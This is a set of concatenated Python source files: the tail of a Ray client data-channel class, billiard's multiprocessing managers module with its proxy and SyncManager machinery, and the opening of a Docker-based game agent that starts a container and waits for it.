"terminated. This is likely because the data channel "
"disconnected at some point before this request was "
"prepared.")
req_id = self._next_id()
req.req_id = req_id
self.request_queue.put(req)
data = None
with self.cv:
self.cv.wait_for(
lambda: req_id in self.ready_data or self._in_shutdown)
if self._in_shutdown:
raise ConnectionError(
"Sending request failed because the data channel "
"terminated. This is usually due to an error "
f"in handling the most recent request: {req}")
data = self.ready_data[req_id]
del self.ready_data[req_id]
return data
def _async_send(self,
req: ray_client_pb2.DataRequest,
callback: Optional[ResponseCallable] = None) -> None:
if self._in_shutdown:
raise ConnectionError(
"Request can't be sent because the data channel is "
"terminated. This is likely because the data channel "
"disconnected at some point before this request was "
"prepared.")
req_id = self._next_id()
req.req_id = req_id
if callback:
self.asyncio_waiting_data[req_id] = callback
self.request_queue.put(req)
def Init(self, request: ray_client_pb2.InitRequest,
context=None) -> ray_client_pb2.InitResponse:
datareq = ray_client_pb2.DataRequest(init=request, )
resp = self._blocking_send(datareq)
return resp.init
def PrepRuntimeEnv(self,
request: ray_client_pb2.PrepRuntimeEnvRequest,
context=None) -> ray_client_pb2.PrepRuntimeEnvResponse:
datareq = ray_client_pb2.DataRequest(prep_runtime_env=request, )
resp = self._blocking_send(datareq)
return resp.prep_runtime_env
def ConnectionInfo(self,
context=None) -> ray_client_pb2.ConnectionInfoResponse:
datareq = ray_client_pb2.DataRequest(
connection_info=ray_client_pb2.ConnectionInfoRequest())
resp = self._blocking_send(datareq)
return resp.connection_info
def GetObject(self, request: ray_client_pb2.GetRequest,
context=None) -> ray_client_pb2.GetResponse:
datareq = ray_client_pb2.DataRequest(get=request, )
resp = self._blocking_send(datareq)
return resp.get
def RegisterGetCallback(self,
request: ray_client_pb2.GetRequest,
callback: ResponseCallable,
context=None) -> None:
datareq = ray_client_pb2.DataRequest(get=request, )
self._async_send(datareq, callback)
def PutObject(self, request: ray_client_pb2.PutRequest,
context=None) -> ray_client_pb2.PutResponse:
datareq = ray_client_pb2.DataRequest(put=request, )
resp = self._blocking_send(datareq)
return resp.put
def ReleaseObject(self,
request: ray_client_pb2.ReleaseRequest,
context=None) -> None:
datareq = ray_client_pb2.DataRequest(release=request, )
self._async_send(datareq)
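# Illustrative sketch (not part of the Ray client API): a stripped-down version
# of the request-id correlation pattern used by _blocking_send/_data_main above,
# with the gRPC response stream replaced by a plain echo thread so the sketch is
# self-contained. Never called at import time.
def _example_request_correlation() -> str:
    ready: Dict[int, str] = {}
    cv = threading.Condition()
    requests: "queue.Queue" = queue.Queue()
    def responder() -> None:
        # stands in for the response stream consumed in _data_main
        while True:
            req_id, payload = requests.get()
            if req_id is None:
                break
            with cv:
                ready[req_id] = "echo:" + payload
                cv.notify_all()
    threading.Thread(target=responder, daemon=True).start()
    requests.put((1, "hello"))
    with cv:
        cv.wait_for(lambda: 1 in ready)
    requests.put((None, None))  # stop the responder thread
    return ready.pop(1)  # -> "echo:hello"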
|
managers.py
|
#
# Module providing the `SyncManager` class for dealing
# with shared objects
#
# multiprocessing/managers.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
from __future__ import absolute_import
__all__ = ['BaseManager', 'SyncManager', 'BaseProxy', 'Token']
#
# Imports
#
import sys
import threading
import array
from traceback import format_exc
from . import util, connection
from .five import Queue, items, monotonic
from .pool import Pool
from .process import (
AuthenticationString, Process, current_process, active_children,
)
from .forking import exit, Popen
from .reduction import ForkingPickler
from .util import Finalize, error, info
#
# Register some things for pickling
#
def reduce_array(a):
return array.array, (a.typecode, a.tostring())
ForkingPickler.register(array.array, reduce_array)
view_types = [type(getattr({}, name)())
for name in ('items', 'keys', 'values')]
if view_types[0] is not list: # only needed in Py3.0
def rebuild_as_list(obj):
return list, (list(obj), )
for view_type in view_types:
ForkingPickler.register(view_type, rebuild_as_list)
try:
import copyreg
except ImportError:
pass
else:
copyreg.pickle(view_type, rebuild_as_list)
#
# Type for identifying shared objects
#
class Token(object):
'''
Type to uniquely identify a shared object
'''
__slots__ = ('typeid', 'address', 'id')
def __init__(self, typeid, address, id):
(self.typeid, self.address, self.id) = (typeid, address, id)
def __getstate__(self):
return (self.typeid, self.address, self.id)
def __setstate__(self, state):
(self.typeid, self.address, self.id) = state
def __repr__(self):
return 'Token(typeid=%r, address=%r, id=%r)' % \
(self.typeid, self.address, self.id)
#
# Function for communication with a manager's server process
#
def dispatch(c, id, methodname, args=(), kwds={}):
'''
Send a message to manager using connection `c` and return response
'''
c.send((id, methodname, args, kwds))
kind, result = c.recv()
if kind == '#RETURN':
return result
raise convert_to_error(kind, result)
def convert_to_error(kind, result):
if kind == '#ERROR':
return result
elif kind == '#TRACEBACK':
assert type(result) is str
return RemoteError(result)
elif kind == '#UNSERIALIZABLE':
assert type(result) is str
return RemoteError('Unserializable message: %s\n' % result)
else:
return ValueError('Unrecognized message type')
class RemoteError(Exception):
def __str__(self):
return ('\n' + '-' * 75 + '\n' + str(self.args[0]) + '-' * 75)
#
# Functions for finding the method names of an object
#
def all_methods(obj):
'''
Return a list of names of methods of `obj`
'''
temp = []
for name in dir(obj):
func = getattr(obj, name)
if callable(func):
temp.append(name)
return temp
def public_methods(obj):
'''
Return a list of names of methods of `obj` which do not start with '_'
'''
return [name for name in all_methods(obj) if name[0] != '_']
#
# Server which is run in a process controlled by a manager
#
class Server(object):
'''
Server class which runs in a process controlled by a manager object
'''
public = ['shutdown', 'create', 'accept_connection', 'get_methods',
'debug_info', 'number_of_objects', 'dummy', 'incref', 'decref']
def __init__(self, registry, address, authkey, serializer):
assert isinstance(authkey, bytes)
self.registry = registry
self.authkey = AuthenticationString(authkey)
Listener, Client = listener_client[serializer]
# do authentication later
self.listener = Listener(address=address, backlog=16)
self.address = self.listener.address
self.id_to_obj = {'0': (None, ())}
self.id_to_refcount = {}
self.mutex = threading.RLock()
self.stop = 0
def serve_forever(self):
'''
Run the server forever
'''
current_process()._manager_server = self
try:
try:
while 1:
try:
c = self.listener.accept()
except (OSError, IOError):
continue
t = threading.Thread(target=self.handle_request, args=(c,))
t.daemon = True
t.start()
except (KeyboardInterrupt, SystemExit):
pass
finally:
self.stop = 999
self.listener.close()
def handle_request(self, c):
'''
Handle a new connection
'''
funcname = result = request = None
try:
connection.deliver_challenge(c, self.authkey)
connection.answer_challenge(c, self.authkey)
request = c.recv()
ignore, funcname, args, kwds = request
assert funcname in self.public, '%r unrecognized' % funcname
func = getattr(self, funcname)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
try:
result = func(c, *args, **kwds)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
msg = ('#RETURN', result)
try:
c.send(msg)
except Exception as exc:
try:
c.send(('#TRACEBACK', format_exc()))
except Exception:
pass
info('Failure to send message: %r', msg)
info(' ... request was %r', request)
info(' ... exception was %r', exc)
c.close()
def serve_client(self, conn):
'''
Handle requests from the proxies in a particular process/thread
'''
util.debug('starting server thread to service %r',
threading.currentThread().name)
recv = conn.recv
send = conn.send
id_to_obj = self.id_to_obj
while not self.stop:
try:
methodname = obj = None
request = recv()
ident, methodname, args, kwds = request
obj, exposed, gettypeid = id_to_obj[ident]
if methodname not in exposed:
raise AttributeError(
'method %r of %r object is not in exposed=%r' % (
methodname, type(obj), exposed)
)
function = getattr(obj, methodname)
try:
res = function(*args, **kwds)
except Exception as exc:
msg = ('#ERROR', exc)
else:
typeid = gettypeid and gettypeid.get(methodname, None)
if typeid:
rident, rexposed = self.create(conn, typeid, res)
token = Token(typeid, self.address, rident)
msg = ('#PROXY', (rexposed, token))
else:
msg = ('#RETURN', res)
except AttributeError:
if methodname is None:
msg = ('#TRACEBACK', format_exc())
else:
try:
fallback_func = self.fallback_mapping[methodname]
result = fallback_func(
self, conn, ident, obj, *args, **kwds
)
msg = ('#RETURN', result)
except Exception:
msg = ('#TRACEBACK', format_exc())
except EOFError:
util.debug('got EOF -- exiting thread serving %r',
threading.currentThread().name)
sys.exit(0)
except Exception:
msg = ('#TRACEBACK', format_exc())
try:
try:
send(msg)
except Exception:
send(('#UNSERIALIZABLE', repr(msg)))
except Exception as exc:
info('exception in thread serving %r',
threading.currentThread().name)
info(' ... message was %r', msg)
info(' ... exception was %r', exc)
conn.close()
sys.exit(1)
def fallback_getvalue(self, conn, ident, obj):
return obj
def fallback_str(self, conn, ident, obj):
return str(obj)
def fallback_repr(self, conn, ident, obj):
return repr(obj)
fallback_mapping = {
'__str__': fallback_str,
'__repr__': fallback_repr,
'#GETVALUE': fallback_getvalue,
}
def dummy(self, c):
pass
def debug_info(self, c):
'''
Return some info --- useful to spot problems with refcounting
'''
with self.mutex:
result = []
keys = list(self.id_to_obj.keys())
keys.sort()
for ident in keys:
if ident != '0':
result.append(' %s: refcount=%s\n %s' %
(ident, self.id_to_refcount[ident],
str(self.id_to_obj[ident][0])[:75]))
return '\n'.join(result)
def number_of_objects(self, c):
'''
Number of shared objects
'''
return len(self.id_to_obj) - 1 # don't count ident='0'
def shutdown(self, c):
'''
Shutdown this process
'''
try:
try:
util.debug('manager received shutdown message')
c.send(('#RETURN', None))
if sys.stdout != sys.__stdout__:
util.debug('resetting stdout, stderr')
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
util._run_finalizers(0)
for p in active_children():
util.debug('terminating a child process of manager')
p.terminate()
for p in active_children():
util.debug('terminating a child process of manager')
p.join()
util._run_finalizers()
info('manager exiting with exitcode 0')
except:
if not error("Error while manager shutdown", exc_info=True):
import traceback
traceback.print_exc()
finally:
exit(0)
def create(self, c, typeid, *args, **kwds):
'''
Create a new shared object and return its id
'''
with self.mutex:
callable, exposed, method_to_typeid, proxytype = \
self.registry[typeid]
if callable is None:
assert len(args) == 1 and not kwds
obj = args[0]
else:
obj = callable(*args, **kwds)
if exposed is None:
exposed = public_methods(obj)
if method_to_typeid is not None:
assert type(method_to_typeid) is dict
exposed = list(exposed) + list(method_to_typeid)
# convert to string because xmlrpclib
# only has 32 bit signed integers
ident = '%x' % id(obj)
util.debug('%r callable returned object with id %r', typeid, ident)
self.id_to_obj[ident] = (obj, set(exposed), method_to_typeid)
if ident not in self.id_to_refcount:
self.id_to_refcount[ident] = 0
# increment the reference count immediately, to avoid
# this object being garbage collected before a Proxy
# object for it can be created. The caller of create()
# is responsible for doing a decref once the Proxy object
# has been created.
self.incref(c, ident)
return ident, tuple(exposed)
def get_methods(self, c, token):
'''
Return the methods of the shared object indicated by token
'''
return tuple(self.id_to_obj[token.id][1])
def accept_connection(self, c, name):
'''
Spawn a new thread to serve this connection
'''
threading.currentThread().name = name
c.send(('#RETURN', None))
self.serve_client(c)
def incref(self, c, ident):
with self.mutex:
self.id_to_refcount[ident] += 1
def decref(self, c, ident):
with self.mutex:
assert self.id_to_refcount[ident] >= 1
self.id_to_refcount[ident] -= 1
if self.id_to_refcount[ident] == 0:
del self.id_to_obj[ident], self.id_to_refcount[ident]
util.debug('disposing of obj with id %r', ident)
#
# Class to represent state of a manager
#
class State(object):
__slots__ = ['value']
INITIAL = 0
STARTED = 1
SHUTDOWN = 2
#
# Mapping from serializer name to Listener and Client types
#
listener_client = {
'pickle': (connection.Listener, connection.Client),
'xmlrpclib': (connection.XmlListener, connection.XmlClient),
}
#
# Definition of BaseManager
#
class BaseManager(object):
'''
Base class for managers
'''
_registry = {}
_Server = Server
def __init__(self, address=None, authkey=None, serializer='pickle'):
if authkey is None:
authkey = current_process().authkey
self._address = address # XXX not final address if eg ('', 0)
self._authkey = AuthenticationString(authkey)
self._state = State()
self._state.value = State.INITIAL
self._serializer = serializer
self._Listener, self._Client = listener_client[serializer]
def __reduce__(self):
return (type(self).from_address,
(self._address, self._authkey, self._serializer))
def get_server(self):
'''
Return server object with serve_forever() method and address attribute
'''
assert self._state.value == State.INITIAL
return Server(self._registry, self._address,
self._authkey, self._serializer)
def connect(self):
'''
Connect manager object to the server process
'''
Listener, Client = listener_client[self._serializer]
conn = Client(self._address, authkey=self._authkey)
dispatch(conn, None, 'dummy')
self._state.value = State.STARTED
def start(self, initializer=None, initargs=()):
'''
Spawn a server process for this manager object
'''
assert self._state.value == State.INITIAL
if initializer is not None and not callable(initializer):
raise TypeError('initializer must be a callable')
# pipe over which we will retrieve address of server
reader, writer = connection.Pipe(duplex=False)
# spawn process which runs a server
self._process = Process(
target=type(self)._run_server,
args=(self._registry, self._address, self._authkey,
self._serializer, writer, initializer, initargs),
)
ident = ':'.join(str(i) for i in self._process._identity)
self._process.name = type(self).__name__ + '-' + ident
self._process.start()
# get address of server
writer.close()
self._address = reader.recv()
reader.close()
# register a finalizer
self._state.value = State.STARTED
self.shutdown = Finalize(
self, type(self)._finalize_manager,
args=(self._process, self._address, self._authkey,
self._state, self._Client),
exitpriority=0
)
@classmethod
def _run_server(cls, registry, address, authkey, serializer, writer,
initializer=None, initargs=()):
'''
Create a server, report its address and run it
'''
if initializer is not None:
initializer(*initargs)
# create server
server = cls._Server(registry, address, authkey, serializer)
# inform parent process of the server's address
writer.send(server.address)
writer.close()
# run the manager
info('manager serving at %r', server.address)
server.serve_forever()
def _create(self, typeid, *args, **kwds):
'''
Create a new shared object; return the token and exposed tuple
'''
assert self._state.value == State.STARTED, 'server not yet started'
conn = self._Client(self._address, authkey=self._authkey)
try:
id, exposed = dispatch(conn, None, 'create',
(typeid,) + args, kwds)
finally:
conn.close()
return Token(typeid, self._address, id), exposed
def join(self, timeout=None):
'''
Join the manager process (if it has been spawned)
'''
self._process.join(timeout)
def _debug_info(self):
'''
Return some info about the server's shared objects and connections
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'debug_info')
finally:
conn.close()
def _number_of_objects(self):
'''
Return the number of shared objects
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'number_of_objects')
finally:
conn.close()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown()
@staticmethod
def _finalize_manager(process, address, authkey, state, _Client):
'''
Shutdown the manager process; will be registered as a finalizer
'''
if process.is_alive():
info('sending shutdown message to manager')
try:
conn = _Client(address, authkey=authkey)
try:
dispatch(conn, None, 'shutdown')
finally:
conn.close()
except Exception:
pass
process.join(timeout=0.2)
if process.is_alive():
info('manager still alive')
if hasattr(process, 'terminate'):
info('trying to `terminate()` manager process')
process.terminate()
process.join(timeout=0.1)
if process.is_alive():
info('manager still alive after terminate')
state.value = State.SHUTDOWN
try:
del BaseProxy._address_to_local[address]
except KeyError:
pass
address = property(lambda self: self._address)
@classmethod
def register(cls, typeid, callable=None, proxytype=None, exposed=None,
method_to_typeid=None, create_method=True):
'''
Register a typeid with the manager type
'''
if '_registry' not in cls.__dict__:
cls._registry = cls._registry.copy()
if proxytype is None:
proxytype = AutoProxy
exposed = exposed or getattr(proxytype, '_exposed_', None)
method_to_typeid = (
method_to_typeid or
getattr(proxytype, '_method_to_typeid_', None)
)
if method_to_typeid:
for key, value in items(method_to_typeid):
assert type(key) is str, '%r is not a string' % key
assert type(value) is str, '%r is not a string' % value
cls._registry[typeid] = (
callable, exposed, method_to_typeid, proxytype
)
if create_method:
def temp(self, *args, **kwds):
util.debug('requesting creation of a shared %r object', typeid)
token, exp = self._create(typeid, *args, **kwds)
proxy = proxytype(
token, self._serializer, manager=self,
authkey=self._authkey, exposed=exp
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
temp.__name__ = typeid
setattr(cls, typeid, temp)
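#
# Illustrative usage sketch (never invoked by this module): register a plain
# class with a BaseManager subclass and call it through the generated proxy.
# The helper classes live at module level so the registry stays picklable; in
# real code this would run under `if __name__ == '__main__':`.
#
class _ExampleCounter(object):
    def __init__(self):
        self._n = 0
    def increment(self):
        self._n += 1
        return self._n
class _ExampleManager(BaseManager):
    pass
def _example_register_usage():
    _ExampleManager.register('Counter', _ExampleCounter)
    manager = _ExampleManager()
    manager.start()
    try:
        counter = manager.Counter()   # AutoProxy for a Counter in the manager process
        return counter.increment()    # -> 1, executed in the manager process
    finally:
        manager.shutdown()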
#
# Subclass of set which get cleared after a fork
#
class ProcessLocalSet(set):
def __init__(self):
util.register_after_fork(self, lambda obj: obj.clear())
def __reduce__(self):
return type(self), ()
#
# Definition of BaseProxy
#
class BaseProxy(object):
'''
A base for proxies of shared objects
'''
_address_to_local = {}
_mutex = util.ForkAwareThreadLock()
def __init__(self, token, serializer, manager=None,
authkey=None, exposed=None, incref=True):
BaseProxy._mutex.acquire()
try:
tls_idset = BaseProxy._address_to_local.get(token.address, None)
if tls_idset is None:
tls_idset = util.ForkAwareLocal(), ProcessLocalSet()
BaseProxy._address_to_local[token.address] = tls_idset
finally:
BaseProxy._mutex.release()
# self._tls is used to record the connection used by this
# thread to communicate with the manager at token.address
self._tls = tls_idset[0]
# self._idset is used to record the identities of all shared
# objects for which the current process owns references and
# which are in the manager at token.address
self._idset = tls_idset[1]
self._token = token
self._id = self._token.id
self._manager = manager
self._serializer = serializer
self._Client = listener_client[serializer][1]
if authkey is not None:
self._authkey = AuthenticationString(authkey)
elif self._manager is not None:
self._authkey = self._manager._authkey
else:
self._authkey = current_process().authkey
if incref:
self._incref()
util.register_after_fork(self, BaseProxy._after_fork)
def _connect(self):
util.debug('making connection to manager')
name = current_process().name
if threading.currentThread().name != 'MainThread':
name += '|' + threading.currentThread().name
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'accept_connection', (name,))
self._tls.connection = conn
def _callmethod(self, methodname, args=(), kwds={}):
'''
Try to call a method of the referent and return a copy of the result
'''
try:
conn = self._tls.connection
except AttributeError:
util.debug('thread %r does not own a connection',
threading.currentThread().name)
self._connect()
conn = self._tls.connection
conn.send((self._id, methodname, args, kwds))
kind, result = conn.recv()
if kind == '#RETURN':
return result
elif kind == '#PROXY':
exposed, token = result
proxytype = self._manager._registry[token.typeid][-1]
proxy = proxytype(
token, self._serializer, manager=self._manager,
authkey=self._authkey, exposed=exposed
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
raise convert_to_error(kind, result)
def _getvalue(self):
'''
Get a copy of the value of the referent
'''
return self._callmethod('#GETVALUE')
def _incref(self):
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'incref', (self._id,))
util.debug('INCREF %r', self._token.id)
self._idset.add(self._id)
state = self._manager and self._manager._state
self._close = Finalize(
self, BaseProxy._decref,
args=(self._token, self._authkey, state,
self._tls, self._idset, self._Client),
exitpriority=10
)
@staticmethod
def _decref(token, authkey, state, tls, idset, _Client):
idset.discard(token.id)
# check whether manager is still alive
if state is None or state.value == State.STARTED:
# tell manager this process no longer cares about referent
try:
util.debug('DECREF %r', token.id)
conn = _Client(token.address, authkey=authkey)
dispatch(conn, None, 'decref', (token.id,))
except Exception as exc:
util.debug('... decref failed %s', exc)
else:
util.debug('DECREF %r -- manager already shutdown', token.id)
# check whether we can close this thread's connection because
# the process owns no more references to objects for this manager
if not idset and hasattr(tls, 'connection'):
util.debug('thread %r has no more proxies so closing conn',
threading.currentThread().name)
tls.connection.close()
del tls.connection
def _after_fork(self):
self._manager = None
try:
self._incref()
except Exception as exc:
# the proxy may just be for a manager which has shutdown
info('incref failed: %s', exc)
def __reduce__(self):
kwds = {}
if Popen.thread_is_spawning():
kwds['authkey'] = self._authkey
if getattr(self, '_isauto', False):
kwds['exposed'] = self._exposed_
return (RebuildProxy,
(AutoProxy, self._token, self._serializer, kwds))
else:
return (RebuildProxy,
(type(self), self._token, self._serializer, kwds))
def __deepcopy__(self, memo):
return self._getvalue()
def __repr__(self):
return '<%s object, typeid %r at %s>' % \
(type(self).__name__, self._token.typeid, '0x%x' % id(self))
def __str__(self):
'''
Return representation of the referent (or a fall-back if that fails)
'''
try:
return self._callmethod('__repr__')
except Exception:
return repr(self)[:-1] + "; '__str__()' failed>"
#
# Function used for unpickling
#
def RebuildProxy(func, token, serializer, kwds):
'''
Function used for unpickling proxy objects.
If possible the shared object is returned, or otherwise a proxy for it.
'''
server = getattr(current_process(), '_manager_server', None)
if server and server.address == token.address:
return server.id_to_obj[token.id][0]
else:
incref = (
kwds.pop('incref', True) and
not getattr(current_process(), '_inheriting', False)
)
return func(token, serializer, incref=incref, **kwds)
#
# Functions to create proxies and proxy types
#
def MakeProxyType(name, exposed, _cache={}):
'''
    Return a proxy type whose methods are given by `exposed`
'''
exposed = tuple(exposed)
try:
return _cache[(name, exposed)]
except KeyError:
pass
dic = {}
for meth in exposed:
exec('''def %s(self, *args, **kwds):
return self._callmethod(%r, args, kwds)''' % (meth, meth), dic)
ProxyType = type(name, (BaseProxy,), dic)
ProxyType._exposed_ = exposed
_cache[(name, exposed)] = ProxyType
return ProxyType
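# Editor's note: an illustrative, never-called sketch (not part of the original
# module). The type name and method names below are hypothetical; the point is
# that MakeProxyType builds a BaseProxy subclass whose methods simply forward
# through _callmethod.
def _example_make_proxy_type():
    QueueProxy = MakeProxyType('QueueProxy', ('put', 'get', 'qsize'))
    # The generated QueueProxy.put(self, *args, **kwds) is equivalent to
    #     self._callmethod('put', args, kwds)
    return QueueProxy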
def AutoProxy(token, serializer, manager=None, authkey=None,
exposed=None, incref=True):
'''
Return an auto-proxy for `token`
'''
_Client = listener_client[serializer][1]
if exposed is None:
conn = _Client(token.address, authkey=authkey)
try:
exposed = dispatch(conn, None, 'get_methods', (token,))
finally:
conn.close()
if authkey is None and manager is not None:
authkey = manager._authkey
if authkey is None:
authkey = current_process().authkey
ProxyType = MakeProxyType('AutoProxy[%s]' % token.typeid, exposed)
proxy = ProxyType(token, serializer, manager=manager, authkey=authkey,
incref=incref)
proxy._isauto = True
return proxy
#
# Types/callables which we will register with SyncManager
#
class Namespace(object):
def __init__(self, **kwds):
self.__dict__.update(kwds)
def __repr__(self):
items = list(self.__dict__.items())
temp = []
for name, value in items:
if not name.startswith('_'):
temp.append('%s=%r' % (name, value))
temp.sort()
return 'Namespace(%s)' % str.join(', ', temp)
class Value(object):
def __init__(self, typecode, value, lock=True):
self._typecode = typecode
self._value = value
def get(self):
return self._value
def set(self, value):
self._value = value
def __repr__(self):
return '%s(%r, %r)' % (type(self).__name__,
self._typecode, self._value)
value = property(get, set)
def Array(typecode, sequence, lock=True):
return array.array(typecode, sequence)
#
# Proxy types used by SyncManager
#
class IteratorProxy(BaseProxy):
if sys.version_info[0] == 3:
        _exposed_ = ('__next__', 'send', 'throw', 'close')
else:
_exposed_ = ('__next__', 'next', 'send', 'throw', 'close')
def next(self, *args):
return self._callmethod('next', args)
def __iter__(self):
return self
def __next__(self, *args):
return self._callmethod('__next__', args)
def send(self, *args):
return self._callmethod('send', args)
def throw(self, *args):
return self._callmethod('throw', args)
def close(self, *args):
return self._callmethod('close', args)
class AcquirerProxy(BaseProxy):
_exposed_ = ('acquire', 'release')
def acquire(self, blocking=True):
return self._callmethod('acquire', (blocking,))
def release(self):
return self._callmethod('release')
def __enter__(self):
return self._callmethod('acquire')
def __exit__(self, exc_type, exc_val, exc_tb):
return self._callmethod('release')
class ConditionProxy(AcquirerProxy):
_exposed_ = ('acquire', 'release', 'wait', 'notify', 'notify_all')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
def notify(self):
return self._callmethod('notify')
def notify_all(self):
return self._callmethod('notify_all')
def wait_for(self, predicate, timeout=None):
result = predicate()
if result:
return result
if timeout is not None:
endtime = monotonic() + timeout
else:
endtime = None
waittime = None
while not result:
if endtime is not None:
waittime = endtime - monotonic()
if waittime <= 0:
break
self.wait(waittime)
result = predicate()
return result
class EventProxy(BaseProxy):
_exposed_ = ('is_set', 'set', 'clear', 'wait')
def is_set(self):
return self._callmethod('is_set')
def set(self):
return self._callmethod('set')
def clear(self):
return self._callmethod('clear')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
class NamespaceProxy(BaseProxy):
_exposed_ = ('__getattribute__', '__setattr__', '__delattr__')
def __getattr__(self, key):
if key[0] == '_':
return object.__getattribute__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__getattribute__', (key,))
def __setattr__(self, key, value):
if key[0] == '_':
return object.__setattr__(self, key, value)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__setattr__', (key, value))
def __delattr__(self, key):
if key[0] == '_':
return object.__delattr__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__delattr__', (key,))
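# Editor's note: a brief illustration (not part of the original module) of the
# forwarding rules above, assuming `ns` is a Namespace proxy obtained from a
# started manager (e.g. ns = manager.Namespace()):
#     ns.x = 1    ->  _callmethod('__setattr__', ('x', 1)) on the referent
#     ns.x        ->  _callmethod('__getattribute__', ('x',))
#     ns._token   ->  handled locally; names starting with '_' are never forwarded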
class ValueProxy(BaseProxy):
_exposed_ = ('get', 'set')
def get(self):
return self._callmethod('get')
def set(self, value):
return self._callmethod('set', (value,))
value = property(get, set)
BaseListProxy = MakeProxyType('BaseListProxy', (
'__add__', '__contains__', '__delitem__', '__delslice__',
'__getitem__', '__getslice__', '__len__', '__mul__',
'__reversed__', '__rmul__', '__setitem__', '__setslice__',
'append', 'count', 'extend', 'index', 'insert', 'pop', 'remove',
'reverse', 'sort', '__imul__',
)) # XXX __getslice__ and __setslice__ unneeded in Py3.0
class ListProxy(BaseListProxy):
def __iadd__(self, value):
self._callmethod('extend', (value,))
return self
def __imul__(self, value):
self._callmethod('__imul__', (value,))
return self
DictProxy = MakeProxyType('DictProxy', (
'__contains__', '__delitem__', '__getitem__', '__len__',
'__setitem__', 'clear', 'copy', 'get', 'has_key', 'items',
'keys', 'pop', 'popitem', 'setdefault', 'update', 'values',
))
ArrayProxy = MakeProxyType('ArrayProxy', (
'__len__', '__getitem__', '__setitem__', '__getslice__', '__setslice__',
)) # XXX __getslice__ and __setslice__ unneeded in Py3.0
PoolProxy = MakeProxyType('PoolProxy', (
'apply', 'apply_async', 'close', 'imap', 'imap_unordered', 'join',
'map', 'map_async', 'starmap', 'starmap_async', 'terminate',
))
PoolProxy._method_to_typeid_ = {
'apply_async': 'AsyncResult',
'map_async': 'AsyncResult',
'starmap_async': 'AsyncResult',
'imap': 'Iterator',
'imap_unordered': 'Iterator',
}
#
# Definition of SyncManager
#
class SyncManager(BaseManager):
'''
Subclass of `BaseManager` which supports a number of shared object types.
The types registered are those intended for the synchronization
of threads, plus `dict`, `list` and `Namespace`.
The `billiard.Manager()` function creates started instances of
this class.
'''
SyncManager.register('Queue', Queue)
SyncManager.register('JoinableQueue', Queue)
SyncManager.register('Event', threading.Event, EventProxy)
SyncManager.register('Lock', threading.Lock, AcquirerProxy)
SyncManager.register('RLock', threading.RLock, AcquirerProxy)
SyncManager.register('Semaphore', threading.Semaphore, AcquirerProxy)
SyncManager.register('BoundedSemaphore', threading.BoundedSemaphore,
AcquirerProxy)
SyncManager.register('Condition', threading.Condition, ConditionProxy)
SyncManager.register('Pool', Pool, PoolProxy)
SyncManager.register('list', list, ListProxy)
SyncManager.register('dict', dict, DictProxy)
SyncManager.register('Value', Value, ValueProxy)
SyncManager.register('Array', Array, ArrayProxy)
SyncManager.register('Namespace', Namespace, NamespaceProxy)
# types returned by methods of PoolProxy
SyncManager.register('Iterator', proxytype=IteratorProxy, create_method=False)
SyncManager.register('AsyncResult', create_method=False)
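# Editor's note: an illustrative, never-called sketch (not part of the original
# module) showing how the registrations above are typically used; it relies only
# on the standard BaseManager start()/shutdown() API.
def _example_sync_manager_usage():
    manager = SyncManager()
    manager.start()                        # spawn the manager server process
    shared = manager.dict()                # DictProxy registered above
    lock = manager.Lock()                  # AcquirerProxy registered above
    with lock:                             # acquire/release forwarded via _callmethod
        shared['count'] = shared.get('count', 0) + 1
    manager.shutdown()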
|
docker_agent.py
|
'''An example docker agent.'''
import json
import time
import os
import threading
import requests
import docker
from . import BaseAgent
from .. import utility
from .. import characters
class DockerAgent(BaseAgent):
"""The Docker Agent that Connects to a Docker container where the character runs."""
def __init__(self,
docker_image,
port,
server='http://localhost',
character=characters.Bomber,
docker_client=None,
env_vars=None):
super(DockerAgent, self).__init__(character)
self._docker_image = docker_image
self._docker_client = docker_client
if not self._docker_client:
self._docker_client = docker.from_env()
self._docker_client.login(
os.getenv("PLAYGROUND_DOCKER_LOGIN"),
os.getenv("PLAYGROUND_DOCKER_PASSWORD"))
self._acknowledged = False # Becomes True when the container is ready.
self._server = server
self._port = port
self._timeout = 32
self._container = None
self._env_vars = env_vars or {}
# Pass env variables starting with DOCKER_AGENT to the container.
for key, value in os.environ.items():
if not key.startswith("DOCKER_AGENT_"):
continue
env_key = key.replace("DOCKER_AGENT_", "")
self._env_vars[env_key] = value
# Start the docker agent if it is on this computer. Otherwise, it's far
# away and we need to tell that server to start it.
if 'localhost' in server:
container_thread = threading.Thread(
target=self._run_container, daemon=True)
container_thread.start()
print("Waiting for docker agent at {}:{}...".format(server, port))
self._wait_for_docker()
else:
request_url = "{}:8000/run_container".format(server)
request_json = {
'docker_image': self._docker_image,
'env_vars': self._env_vars,
'port': port
}
requests.post(request_url, json=request_json)
waiting_thread = threading.Thread(
target=self._wait_for_docker, daemon=True)
waiting_thread.start()
def _run_container(self):
print("Starting container...")
self._container = self._docker_client.containers.run(
self._docker_image,
detach=True,
auto_remove=True,
ports={10080: self._port},
environment=self._env_vars)
for line in self._container.logs(stream=True):
print(line.decode("utf-8").strip())
def _wait_for_docker(self):
"""Wait for network service to appear. A timeout of 0 waits forever."""
timeout = self._timeout
backoff = .25
max_backoff = min(timeout, 16)
if timeout:
            # compute an absolute deadline so every retry branch below honors the same timeout
end = time.time() + timeout
while True:
try:
now = time.time()
                if timeout and end < now:
                    print("Timed out - %s:%s" % (self._server, self._port))
                    raise TimeoutError(
                        "Timed out waiting for docker agent at %s:%s"
                        % (self._server, self._port))
request_url = '%s:%s/ping' % (self._server, self._port)
